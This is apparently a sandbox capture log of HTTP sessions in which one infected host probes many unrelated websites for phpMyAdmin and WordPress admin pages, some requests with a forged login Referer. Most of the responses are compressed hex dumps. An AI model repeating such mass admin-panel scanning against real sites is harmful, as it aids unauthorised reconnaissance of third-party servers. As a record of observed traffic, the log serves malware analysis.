Feb 21, 2024 00:26:10.045197010 CET	432	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:09 GMT server: Apache set-cookie: __tad=1708471569.6047398; expires=Fri, 17-Feb-2034 23:26:09 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 137 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8e 41 12 c2 30 0c 03 cf f8 15 26 9c 43 78 80 9b 03 3f 71 db 94 16 02 e9 04 c3 d0 df e3 c6 3a 49 9e d1 5a 34 cb 33 47 00 9a 13 8f 11 48 16 c9 29 4e f5 cc 1f 0a 16 80 de 43 5d 56 41 d9 d6 d4 39 49 3f 09 77 fe b2 5d 9d 96 81 82 05 f3 86 52 d7 97 71 c3 fe 36 94 5c 6a e7 4e 53 93 c3 9d a0 f1 d2 a4 fd 03 1d bd c7 6b e6 d7 03 d1 7b 7d 18 f6 66 6c 2c 9b 07 7f 28 5c 82 ab a8 00 00 00 Data Ascii: %A0&Cx?q:IZ43GH)NC]VA9I?w]Rq6\jNSk{}fl,(\

Session ID	Source IP	Source Port	Destination IP	Destination Port
169	192.168.2.6	57512	185.230.63.107	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.897104025 CET	178	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: sportclinic.co.il Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.045826912 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive x-wix-request-id: 1708471569.9371478897651118264 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLhe/Ft074qYAt5jyfc2Z/bHu/2EjeiyKjB/JVOb8T5Ve,2d58ifebGbosy5xc+FRaltsDqnSAYej6vb0pHzfo6Pv+0onXBzV8eFLBxF480qVupvQR8PIyKaPW965IxV4qlQ==,2UNV7KOq4oGjA5+PKsX47K15rLvEnClnBsBBVIBt3LYfbJaKSXYQ/lskq2jK6SGP,O/1L7HVJdzQznP2rkpsRxjnWIsxCDt4gAQNDCnrR7Tg=,VI+HaNobgySA5doUjXm1fE25g4VH7sBSTs1/4S1HbnY=,/j+AjfLiOiE0Vc9NsP8sKwcmZX7bZaqsAarZ9kZCraIK4Mgie0A7sA26FMNDNnzmHBYPX2JP4g7LW6bXK9DsVw== Vary: Accept-Encoding X-Content-Type-Options: nosniff Content-Encoding: gzip Transfer-Encoding: chunked Data Raw: 34 34 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 91 9b c4 4e 26 05 e8 b2 14 cb cb 30 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff 7d 77 92 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 21 e7 8c 71 7e 79 70 90 1d 96 b6 08 ab 06 58 15 6a 7d 89 67 ce 0f 18 7e e8 36 23 1a 33 73 2e 9b 26 8f 16 6a 79 ed 9c 75 bf cb 39 f8 f7 4d 13 d1 03 90 e5 25 be cf 6a 08 92 19 59 43 1e dd 2b 58 34 d6 85 88 15 d6 04 30 81 58 cb 50 e5 25 dc ab 02 78 77 38 52 46 05 25 35 f7 85 d4 90 a7 47 ac 96 4b 55 b7 f5 7f 84 d6 83 eb 4e 72 8a 2f 8c 45 7d 6b 45 45 25 9d 07 14 dc 86 19 9f 6c 5d 54 21 34 1c be b6 ea 3e 8f fe e2 1f df f3 2b 5b 37 32 28 94 b0 65 ce cd 75 0e e5 1c 7a be a0 82 06 02 39 55 a6 cc a3 b8 41 78 5f 3a 62 cc fe 61 c1 49 e3 b5 0c f8 38 13 1d f5 31 dc 12 7c e1 54 13 94 35 5b 2a b6 6c da c3 2b 3b 5c ce 4e 6d f0 5b 72 8d 45 2b 61 79 c4 8c 9d 59 ad ed a2 67 d9 04 94 42 97 69 65 ee 18 05 35 8f 54 8d 70 44 63 e6 11 ab 1c cc f2 48 88 c5 62 91 60 2c 93 c2 d6 62 26 31 24 d6 24 f8 15 31 07 3a 8f 7c 85 a1 2b da c0 88 be 23 bc 17 bd 96 e4 03 ba b6 48 1a e9 a4 0f d6 a1 a6 4e 28 c6 8d 02 ed 45 a8 94 2b 39 5e 87 95 98 61 2e 78 f1 2b e8 7b 40 1e d9 9d 3f c8 02 39 3c e2 eb 55 87 95 06 5f 01 60 ea f4 d6 07 58 06 d1 3d 10 9d db b7 60 f6 96 ec f0 3d d7 34 74 00 6f da a9 56 85 48 93 71 7a 9e 1c 0b df a9 17 40 39 8e 46 63 92 0f a4 ce c4 87 fa 33 d1 67 7e 36 b5 e5 8a 69 69 e6 79 04 18 7f Data Ascii: 444Vo6_E-N&0l((Z:[L(R%F}w9ql7c!q~ypXj}g~6#3s.&jyu9M%jYC+X40XP%xw8RF%5GKUNr/E}kEE%l]T!4>+[72(euz9UAx_:baI81\|T5[*l+;\Nm[rE+ayYgBie5TpDcHb`,b&1$$1:\|+#HN(E+9^a.x+{@?9<U_`X=`=4toVHqz@9Fc3g~6iiy
Feb 21, 2024 00:26:10.045841932 CET	629	IN	Data Raw: 4c 23 4a 7a 87 a1 01 97 47 9b 7a b9 da 10 99 f4 ac 53 41 65 74 15 9c c6 e0 6a e9 3d f2 6f 14 53 bd f5 b2 fa 9b 6f b1 07 14 5b 4a b7 e2 53 59 dc cd 9d 6d 4d 19 5f 30 e5 ff 5c 5f fc bc a1 7f 47 5b c9 53 9f d4 8c e9 c0 6e ae d9 f9 67 a4 f4 59 ca bc Data Ascii: L#JzGzSAetj=oSo[JSYmM_0\_G[SngY+(S+UQV&EdDe2vA6wA4-?=NF)jHyQvn0c'mK^PLVKw(M@xv";U:1k\[j_B$k%?

Session ID	Source IP	Source Port	Destination IP	Destination Port
170	192.168.2.6	57376	217.70.184.38	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.901151896 CET	232	OUT	GET /wp-admin/ HTTP/1.1 Host: network-abilities.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://network-abilities.com/wp-login.php
Feb 21, 2024 00:26:10.068033934 CET	1167	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Language Content-Encoding: gzip Data Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 55 cd 72 db 36 10 be e7 29 50 5e 9c 4c 46 a4 29 d9 b1 d4 a1 98 49 ed 5a 4e 2b 8f 5c 3b b5 27 ba 68 40 70 45 c2 02 01 06 00 45 d1 a7 bc 46 5f af 4f d2 e5 8f 52 39 96 a6 9d f6 02 81 c0 b7 bb d8 6f bf 5d 05 3f 5c cc ce 3f 7d be f9 99 a4 36 13 e1 ab a0 fe 21 4c 50 63 c6 8e 54 bd 47 e3 10 41 65 32 06 19 be 22 24 48 81 c6 f5 06 b7 19 58 4a 58 4a b5 01 3b 76 0a bb ec 0d 9d dd 2b 49 33 18 3b 6b 0e 65 ae b4 75 08 53 d2 82 44 68 c9 63 9b 8e 63 58 73 06 bd e6 63 8f 5d 0c 86 69 9e 5b ae e4 8e e9 a7 94 1b 12 ab 8c 72 d9 e0 48 4a 0d 89 00 24 d1 90 70 63 41 43 4c 4a 6e 53 32 a1 32 e6 ae 04 eb 92 8f 96 a0 15 2b b4 46 1f a2 22 39 d5 2b 84 45 15 b1 29 10 55 4a d0 ee f6 05 96 5b 01 21 9a 95 4a af 7a 34 e2 82 5b 0e c6 65 2a 0b bc f6 b2 05 0a 2e 57 18 54 8c 1d 63 2b 01 26 05 c0 1c 6d 95 e3 db 2d 6c ac c7 0c 52 97 6a 58 8e 9d fa b9 bd b3 e1 f0 e4 64 70 7a ec d6 17 2f 9d a4 c8 11 2b f0 a5 ac 4e b8 b5 5b d2 75 fd e9 e2 b2 75 cd 33 9a 80 b7 e9 35 30 ef 85 9b 1c 57 45 63 87 50 2c df 12 59 fb e6 0a f7 c6 bb ae 57 d0 9a da de 2d 24 85 a0 da 2d d5 72 d9 df 7a af 51 5e 77 c2 b4 32 46 69 9e 70 f9 7f e2 dc 41 c6 7f 52 22 fe f7 81 02 6f 2b b2 20 52 71 d5 c5 8e f9 7a 2b cb 1b ac 1f 97 c9 0d 32 b1 e8 1f f7 07 3d ad 94 5d f4 e3 bc 30 c4 09 83 46 1c 1d 74 26 e2 3b 4b 2d 67 3b 40 ff c3 a4 f2 49 e7 64 e7 fc 4b 7a fd 5b 1f ed 31 52 18 50 8d 46 02 be 0b d9 a2 3b 35 2e 7c fd 61 78 86 06 a9 7f 20 5c a3 97 85 3f 60 f0 ab 13 fe 07 e9 22 13 7e b8 9b f9 f7 fe 51 67 8b c1 99 fc 32 7b 9e 4e 73 ee ff 32 af 50 68 41 8e c9 74 c5 49 ad cd cd 8f 9e 57 a6 8a 1b 37 d9 86 f1 40 7a 1a 4c 21 ac 79 6f 80 6a 96 8e f7 36 00 3a 33 56 2b 99 84 f7 d8 d4 4d f3 3c 5c cd 3e de 91 ce 98 a8 25 39 d0 39 9d 5d e0 d1 90 58 45 12 b0 8d 79 4b c7 9f 5f ff 30 24 2f 22 c1 59 c7 05 0a 07 fb 9e 70 b9 54 3a 6b f6 6e e0 61 22 5e 53 9b 97 52 68 d3 ce 95 e1 35 36 52 9b 45 7f 96 4c 53 e7 30 56 15 48 78 03 7c f4 87 b6 a6 69 2f 2c 52 3a 6e 71 fe a4 8c 16 35 03 39 95 7b a1 f5 63 6b e0 c5 75 bc b4 7f 53 f5 0f 84 44 9a a0 e8 51 19 85 a4 6b ca 05 8d 04 e0 2d 06 09 77 32 6e d7 fd 4f ac 9b d2 9c a3 24 91 49 d0 0b 7f b4 f1 99 13 3e 50 69 49 a5 0a 5d cf b7 5d d9 bd c7 90 de 1e 49 94 e5 73 41 b4 26 4e 38 45 41 48 92 29 0d 84 46 c8 da 4e dd 5a 19 a3 d6 40 1a a4 dd 90 12 48 46 25 b6 65 5d e7 36 ce 41 ba a2 c2 5a 25 17 8f a7 53 ae b7 b4 2a c9 50 03 ab fa 1f 42 c6 aa 74 85 62 6d f1 35 e4 82 32 78 4d ad 8a 5e 1f d1 ab db 63 76 75 fd 6e 5a 8d 9e e8 64 54 4e b3 38 8d b2 db 7c 9a 9d 8a f8 7c 24 22 3e 5a 45 7d 3f a5 0f 27 6b 36 b8 97 f3 fe fd 53 7c 31 7a 8a 06 f7 d5 e7 fe ef 23 36 b9 ac 68 5f 14 f3 6a fe 34 7f b8 c4 b3 64 74 f4 86 bc 25 47 7b 8b 75 f4 c6 21 5a 09 9c 5a 35 d5 38 c1 f0 56 c6 b0 19 3b c7 4e 78 89 5b 42 9f 11 62 78 86 75 d4 b5 ce 0f 15 bf 2d ef 4e 95 bb 71 f3 ad de b5 b7 ee a3 99 88 ed 20 c4 79 d0 fc 49 ff 05 75 b4 23 94 b5 07 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 3aeUr6)P^LF)IZN+\;'h@pEEF_OR9o]?\?}6!LPcTGAe2"$HXJXJ;v+I3;keuSDhccXsc]i[rHJ$pcACLJnS22+F"9+E)UJ[!Jz4[e.WTc+&m-lRjXdpz/+N[uu350WEcP,YW-$-rzQ^w2FipAR"o+ Rqz+2=]0Ft&;K-g;@IdKz[1RPF;5.\|ax \?`"~Qg2{Ns2PhAtIW7@zL!yoj6:3V+M<\>%99]XEyK_0$/"YpT:kna"^SRh56RELS0VHx\|i/,R:nq59{ckuSDQk-w2nO$I>PiI]]IsA&N8EAH)FNZ@HF%e]6AZ%SPBtbm52xM^cvunZdTN8\|\|$">ZE}?'k6S\|1z#6h_j4dt%G{u!ZZ58V;Nx[Bbxu-Nq yIu#0

Session ID	Source IP	Source Port	Destination IP	Destination Port
171	192.168.2.6	57502	72.52.178.23	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.910841942 CET	174	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: imailzone.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
172	192.168.2.6	57366	109.71.40.107	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.918709040 CET	216	OUT	GET /wp-admin/ HTTP/1.1 Host: cpsgroupe.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://cpsgroupe.com/wp-login.php
Feb 21, 2024 00:26:10.101289034 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:10 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 33 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 Data Ascii: 536<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])), east=+((+!+[]+!![]+!![]+!![])+(+!+[]+[])+(+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![])+(+![]+[])),
Feb 21, 2024 00:26:10.101301908 CET	395	IN	Data Raw: 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3b 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 21 21 30 3b 7d 20 7d 2c 0a 20 20 20 20 20 Data Ascii: x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("onreadystatechange",y);}; y(function(){ document.g
Feb 21, 2024 00:26:10.101315022 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
173	192.168.2.6	57414	162.241.216.197	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.926630974 CET	186	OUT	GET /phpmyadmin/ HTTP/1.1 Host: wilsonfamilyinsurance.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.390446901 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:10 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 7939 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://wilsonfamilyinsurance.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 Set-Cookie: PHPSESSID=08970b3d20577a8a4bf2f1bbb4da462b; path=/ Data Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 72 6b 73 db b6 d6 f5 e7 78 a6 ff 01 66 a6 b1 d4 0a a4 6e be c9 a6 fb e4 a4 c9 79 72 a6 a7 e9 d3 a4 d3 f7 4c 92 c9 40 e4 26 09 1b 04 58 00 d4 a5 ae ff fb bb 41 5d 2c cb 94 ec c4 4e 8f e2 48 24 b0 f7 5a 6b af bd be d9 f9 66 e7 74 f7 c7 37 2f de fd e7 97 97 24 b3 b9 38 c3 03 f7 4b 04 93 69 e8 81 a4 bf bd f5 aa 43 60 b1 fb cd c1 32 12 65 4c 1b b0 a1 f7 db bb 57 f4 c8 23 c1 f2 26 b3 b6 a0 f0 47 c9 47 a1 f7 ff e8 6f cf e9 0b 95 17 cc f2 a1 00 8f 44 4a 5a 90 d8 f6 fa 65 08 71 0a de b2 4d b2 1c 42 6f c4 61 5c 28 6d 57 2a c7 3c b6 59 18 c3 88 47 40 ab 97 16 e1 92 5b ce 04 35 11 13 10 76 bc 33 f2 0d ce 41 c8 a9 e5 56 c0 d9 2f 2c 05 22 95 25 89 2a 65 4c 9e 3d 3d ea 76 3a 27 e4 77 2e 8c 92 e4 15 cb b9 98 92 d7 d2 94 9a c9 08 4e 83 59 d7 aa 90 3d ad 86 ca 9a bd a5 8c bd 9c 4d 28 cf 11 98 16 1a 9c cc 81 60 3a 85 3d 9c 7c e7 54 70 79 41 34 88 70 2f 96 c6 15 24 60 a3 6c 8f 64 f8 14 ee 05 81 b1 cc 1a 7f 5c f8 91 ca ef d7 91 20 af f1 53 a5 52 01 ac e0 e6 fe 9d a3 b6 3f 56 3a c6 0b f3 19 5d bc 5d 2f cf 63 c2 82 96 cc e2 f2 ec b4 c0 15 b1 a2 10 3c c2 85 2a 19 68 63 be 9f e4 02 af 9c 83 a1 b7 c1 61 f2 4c b3 3f 4a 75 42 5e 01 c4 de 8c d3 73 39 31 83 20 18 57 3d 49 d5 c2 17 1d 4e 49 90 60 75 e0 7d 4d 3d 18 cd 1c b7 6b 3e 53 58 34 6f 5b 51 f8 e4 c9 e9 2e a5 e4 5d c6 0d 31 dc 02 29 0d 18 62 33 20 ff ac 76 48 9e 4b 26 a6 96 47 86 0c a7 e4 df 4a 1a 1c 03 05 f1 34 43 fa 42 94 29 97 64 74 e4 77 fb 7e 9b 50 f2 9b e1 32 5d e9 b1 9a 45 17 ee 88 92 a5 bc f1 d8 cf 67 38 7c 8e 53 89 23 94 2e e5 fc ac 2c 0c 6e b1 a1 44 a9 2c 89 4a ad 71 0a 34 06 43 9e f0 b4 d4 10 13 74 cb 2e 66 f0 71 1c 98 4d a3 c6 12 34 91 38 2e 6a 51 84 95 38 99 b4 ce 76 20 63 6e b3 db 53 72 59 4d bf ce 6d c0 5a 9c 03 47 66 12 84 3f 17 fb 64 a9 f7 7a d2 48 c5 e0 ca 97 25 55 45 70 2f 3f e7 16 98 48 f3 c2 ce 73 62 61 62 83 73 36 62 b3 53 ef 6c 27 f8 8e 9c ee be 7f f1 e3 f3 77 cf df 93 ef 82 9d 31 97 b1 1a fb 9f c6 05 e4 ea 9c bf 5d 48 0d c9 a5 37 64 06 7e d3 c2 1b cc e3 f1 21 f8 10 18 7f ec 2b 9d 7e 08 78 ce 52 30 1f 30 17 1a 3e 04 55 f3 87 a0 83 9b f4 db 1f 82 c3 ee e4 b0 fb 21 f0 5a 1e 0a c0 7e bf 90 29 be 98 51 fa 65 78 d8 58 a1 e1 ef cb 19 20 3e b9 77 55 ea 08 bc c1 a5 87 eb 74 8b 71 6d 73 fc 0a 7e 63 9e f1 aa a0 5c 46 a2 8c 1d eb b9 a9 0e aa 7e aa 41 00 8e ee e7 5c fa e7 e6 87 11 e8 f0 c0 ef fb Data Ascii: rksxfnyrL@&XA],NH$Zkft7/$8KiC`2eLW#&GGoDJZeqMBoa\(mW<YG@[5v3AV/,"%eL==v:'w.NY=M(`:=\|TpyA4p/$`ld\ SR?V:]]/c<*hcaL?JuB^s91 W=INI`u}M=k>SX4o[Q.]1)b3 vHK&GJ4CB)dtw~P2]Eg8\|S#.,nD,Jq4Ct.fqM48.jQ8v cnSrYMmZGf?dzH%UEp/?Hsbabs6bSl'w1]H7d~!+~xR00>U!Z~)QexX >wUtqms~c\F~A\
Feb 21, 2024 00:26:10.390573978 CET	1286	IN	Data Raw: 3d ef ea ea 04 0d dc 9d 25 3e e1 b8 11 fc c5 5c 28 9a 02 66 05 f9 63 e7 e9 6e 52 ca c8 72 25 1b bc 25 9b 97 23 a6 89 6a 99 16 9c 2c ce 49 d4 80 e6 a5 d5 d3 ea ce 86 97 a6 2c 0a a5 ed 3b 30 d6 0c a0 65 79 8e 4f 2c 2f 06 0d 09 63 f2 23 02 37 fd 11 Data Ascii: =%>\(fcnRr%%#j,I,;0eyO,/c#7%I [4c`^7?j\!Ol^+QE94GBdVLbZ1mvXpjXnp*f)jrE>~$+MR<`K-C0m,5/~o?^5
Feb 21, 2024 00:26:10.390665054 CET	1286	IN	Data Raw: 4e 8d 9d 0a 20 3c 0e f7 c6 05 ad 3a 68 75 64 28 97 82 4b a0 91 31 7b c4 4e 0b 08 f7 2c 4c 6c e0 de cf 76 76 9e f0 3c 45 31 d4 e4 5c c0 b4 45 dc 6b d5 4e 2e 77 9e 3c 89 b9 29 04 9b 0e c8 0c 84 ec f2 dc 79 c6 a4 3d c1 db a1 d2 31 e8 01 91 aa e6 6a Data Ascii: N <:hud(K1{N,Llvv<E1\EkN.w<)y=1jBMpx@v3.rS.M~5OnVkU,cqDA{3{3}(TtAj33IY[`Q2aKSj&#<f.#Q`f47fK~yn-s
Feb 21, 2024 00:26:10.390728951 CET	1286	IN	Data Raw: 9d a1 9d b1 0d 95 8e 81 95 93 3b 98 70 04 1c ab 73 b0 7f 1d 0a 3c eb ef e3 5f 93 ec 2f c8 d1 a5 76 eb a0 7b ef 8c c6 a5 b9 b8 c7 88 bd 56 a7 d3 bd 1e f1 f8 b8 75 84 36 1f 77 af 99 0f f6 5b 47 18 9b f6 d1 5d d4 05 13 40 55 04 4c de cd db af b8 af Data Ascii: ;ps<_/v{Vu6w[G]@ULyVB}pGnNeh;G]/m4a{BhJMNl.!e> *t!l+,[e`)~_CWn)cIgT`En+9;Rr
Feb 21, 2024 00:26:10.390839100 CET	1286	IN	Data Raw: eb b2 c3 74 0a 5f 00 58 f5 d5 e0 4d be 18 71 52 87 b9 e3 63 f5 50 a8 e8 82 4a 36 e2 29 b3 5c 49 c2 06 e3 0c 34 34 06 52 d9 86 ab c0 45 e7 d5 f6 4a 6b 95 6c 36 2f 23 25 94 1e 10 2e b1 8e 3b 9c 79 c7 35 5c a1 8c a5 16 f2 42 30 0b 3e 77 4e 4c 55 69 Data Ascii: t_XMqRcPJ6)\I44REJkl6/#%.;y5\B0>wNLUii"`LY1 {S(nYaZV\|*J!(\|wj@3pauGw;psD=pOC5s.id4$^fm11F\L4r#(-B)eO4,"2j8\|
Feb 21, 2024 00:26:10.390856028 CET	1286	IN	Data Raw: f6 b4 dd 3b 3a 31 46 84 1d 8f 18 fe 27 98 d0 eb 75 27 bd ae 47 82 b3 9d ff 96 b8 ce b1 53 87 df 75 f2 f0 78 82 ff d7 05 b2 a2 10 40 ad 2a a3 8c fe bd 62 8f da 4e ec 51 fb 86 58 27 2e 07 cb 88 64 39 84 5e 6e 9c 3e 1e 31 cb 95 a4 ef b8 80 d7 39 4b Data Ascii: ;:1F'u'GSux@*bNQX'.d9^n>19K#sAg[:0H#JY{&J1hYK3 brsEVQPz@&t7/5Hynl9!jSj9w;\b&;(maaM
Feb 21, 2024 00:26:10.390963078 CET	741	IN	Data Raw: b9 fe d3 80 9d 55 99 df f9 ea ee f4 ee 76 a7 50 c6 7e 72 4f b7 0d 2a 58 0a 1b ec e9 d5 db f3 42 e5 05 93 1c cc 76 8f cc 36 93 82 68 01 12 78 67 4b c0 bf d1 b4 fe d7 32 ad 5f 6f da ff 95 ca de 11 aa ed 86 fd e1 00 d0 ac 0a e8 6f 34 6a ff 6b 19 b5 Data Ascii: UvP~rOXBv6hxgK2_oo4jk_o-Ab.[Ac/,zge5oA)H4lt4RJC*CEAp]!y)awo~q?+K^RNdoVO..U

Session ID	Source IP	Source Port	Destination IP	Destination Port
174	192.168.2.6	57507	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.957726002 CET	174	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
